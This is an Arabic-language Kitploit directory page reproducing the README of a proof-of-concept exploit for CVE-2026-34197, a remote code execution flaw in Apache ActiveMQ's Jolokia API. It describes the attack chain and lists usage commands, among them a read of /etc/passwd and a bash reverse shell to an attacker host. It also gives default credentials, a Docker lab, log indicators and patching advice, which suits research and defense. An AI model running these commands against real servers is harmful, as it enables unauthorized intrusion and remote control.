Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-34197 — إثبات مفهوم لاستغلال CVE-2026-34197، وهو ثغرة تنفيذ أوامر عن بُعد (RCE) في Apache ActiveMQ عبر واجهة Jolokia API. يتضمن استغلالًا بلغة Python، وقالب حمولة، ومختبر Docker للاختبار والبحث. | Kitploit
أدوات/GitHubGitHub/devsecurityspro/cve-2026-34197
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمرمختبرات وتدريب عملي
GitHubdevsecurityspro/cve-2026-34197

CVE-2026-34197

إثبات مفهوم لاستغلال CVE-2026-34197، وهو ثغرة تنفيذ أوامر عن بُعد (RCE) في Apache ActiveMQ عبر واجهة Jolokia API. يتضمن استغلالًا بلغة Python، وقالب حمولة، ومختبر Docker للاختبار والبحث.

عرض المستودع
4منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-34197 — Apache ActiveMQ RCE عبر واجهة Jolokia API

الوصف

CVE-2026-34197 هي ثغرة تنفيذ أوامر عن بُعد (RCE) في Apache ActiveMQ Classic تسمح للمهاجم بتنفيذ أوامر عشوائية على نظام تشغيل الخادم عبر واجهة Jolokia API المكشوفة في وحدة التحكم الويب.

الضعف موجود منذ أكثر من 13 عامًا ويقع في التفاعل بين مكونات متعددة: Jolokia (جسر HTTP-JMX)، وMBeans الخاصة بـ ActiveMQ، وموصلات الشبكة، ونقل VM.

معلومات الثغرة

الحقلالتفاصيل
CVE IDCVE-2026-34197
النوعRCE (تنفيذ أوامر عن بُعد)
CWECWE-20 (تحقق غير صحيح من الإدخال)، CWE-94 (حقن الكود)
الإصدارات المتأثرةActiveMQ Classic < 5.19.4، 6.0.0 — 6.2.2
الإصدارات المُصححة5.19.4، 6.2.3
المصادقة المطلوبةنعم (بيانات الاعتماد الافتراضية admin:admin شائعة)
بدون مصادقة في6.0.0 — 6.1.1 (بسبب CVE-2024-32114)
المنفذ الافتراضي8161 (وحدة التحكم الويب)

آلية الاستغلال

سلسلة الهجوم تعمل كالتالي:

  1. يرسل المهاجم طلب POST إلى /api/jolokia/ مستدعيًا عملية addNetworkConnector الخاصة بـ MBean الخاص بالوسيط (broker).
  2. تحتوي الوسيطة على URI بنقل vm:// يشير إلى وسيط غير موجود.
  3. يحاول ActiveMQ إنشاء هذا الوسيط فورًا ويقبل معامل brokerConfig الذي يشير إلى عنوان URL بعيد.
  4. يشير مخطط xbean: إلى أن المورد هو ملف تكوين Spring XML.
  5. يقوم Spring بإنشاء جميع الـ beans المعرّفة في XML، بما في ذلك واحد ينفذ Runtime.getRuntime().exec().
  6. يتم تنفيذ الأمر العشوائي على الخادم.
root@kitploit:~
المهاجم                          ActiveMQ (الضحية)
   |                                    |
   |-- POST /api/jolokia/ ------------>|
   |   addNetworkConnector(            |
   |     vm://rce?brokerConfig=        |
   |     xbean:http://ATACANTE/x.xml)  |
   |                                    |
   |                                    |-- إنشاء وسيط VM
   |                                    |-- تنزيل x.xml
   |<-- GET /x.xml --------------------|
   |-- الرد بحمولة XML --------------->|
   |                                    |-- Spring ينشئ الـ beans
   |                                    |-- Runtime.exec(الأمر)
   |                                    |

هيكل المشروع

root@kitploit:~
CVE-2026-34197/
├── README.md              # هذا الملف
├── exploit.py             # الـ PoC الرئيسي
├── payloads/
│   └── template.xml       # قالب حمولة Spring XML
├── docker/
│   └── docker-compose.yml # بيئة مختبرية قابلة للاستغلال
└── LICENSE

المتطلبات

  • Python 3.8+
  • الوحدات: requests, http.server, argparse (مكتبة قياسية)
  • وصول شبكي إلى المنفذ 8161 على الهدف
  • Docker و Docker Compose (اختياري، للمختبر)
root@kitploit:~
pip install requests

الاستخدام

1. تشغيل البيئة القابلة للاستغلال (اختياري)

root@kitploit:~
cd docker
docker-compose up -d

هذا يشغّل ActiveMQ Classic 5.18.6 قابل للاستغلال على localhost:8161.

2. تنفيذ الاستغلال

root@kitploit:~
# الاستخدام الأساسي مع بيانات الاعتماد الافتراضية
python exploit.py -t http://الهدف:8161 -l IP_المهاجم -c "id"

# تحديد بيانات الاعتماد
python exploit.py -t http://الهدف:8161 -l IP_المهاجم -c "whoami" -u admin -p admin

# تحديد منفذ خادم HTTP للحمولة
python exploit.py -t http://الهدف:8161 -l IP_المهاجم -lp 9999 -c "cat /etc/passwd"

# وضع بدون مصادقة (ActiveMQ 6.0.0 - 6.1.1)
python exploit.py -t http://الهدف:8161 -l IP_المهاجم -c "id" --no-auth

# شل عكسي
python exploit.py -t http://الهدف:8161 -l IP_المهاجم -c "bash -i >& /dev/tcp/IP_المهاجم/4444 0>&1"

المعاملات

المعاملالوصف
-t, --targetعنوان URL الأساسي للهدف (مثال: http://10.0.0.1:8161)
-l, --lhostعنوان IP للمهاجم لخدمة حمولة XML
-lp, --lportمنفذ خادم HTTP المحلي (الافتراضي: 8888)
-c, --commandالأمر المراد تنفيذه على الهدف
-u, --userاسم المستخدم (الافتراضي: admin)
-p, --passwordكلمة المرور (الافتراضية: admin)
--no-authعدم إرسال بيانات الاعتماد (للإصدارات 6.0.0 - 6.1.1)
--broker-nameاسم الوسيط (الافتراضي: localhost)

الاكتشاف

مؤشرات في سجلات وسيط ActiveMQ:

root@kitploit:~
INFO  | Establishing network connection from vm://localhost to vm://rce?create=true&brokerConfig=xbean:http://X.X.X.X:8888/payload.xml
WARN  | Could not connect to remote URI: vm://rce?create=true&brokerConfig=xbean:http://X.X.X.X:8888/payload.xml

مؤشرات أخرى:

  • طلبات POST إلى /api/jolokia/ مع addNetworkConnector في الجسم
  • اتصالات HTTP صادرة من عملية ActiveMQ إلى مضيفين غير متوقعين
  • عمليات فرعية غير متوقعة تم إنشاؤها بواسطة عملية Java الخاصة بـ ActiveMQ

المعالجة

  • التحديث إلى ActiveMQ Classic 5.19.4 أو 6.2.3
  • تغيير بيانات الاعتماد الافتراضية لوحدة التحكم الويب
  • تقييد الوصول الشبكي إلى المنفذ 8161
  • مراقبة سجلات الوسيط بحثًا عن URIs من نوع vm:// مع brokerConfig=xbean:http

المراجع

  • NVD — CVE-2026-34197
  • Horizon3 — التحليل الفني
  • Apache ActiveMQ — إشعار الأمان
  • CVE-2024-32114 — Jolokia بدون مصادقة
  • CVE-2023-46604 — RCE عبر OpenWire (CISA KEV)

المؤلف

تم إنشاؤه بواسطة KONDOR DEV SECURITY

Telegram

إخلاء مسؤولية قانوني

يتم توفير هذا الـ PoC حصريًا للأغراض التعليمية وبحوث الأمان. استخدام هذه الأداة ضد أنظمة دون إذن صريح غير قانوني. المؤلف غير مسؤول عن سوء استخدام هذه الأداة.

الترخيص

MIT — حقوق النشر (c) 2026 KONDOR DEV SECURITY

تنزيل الأداة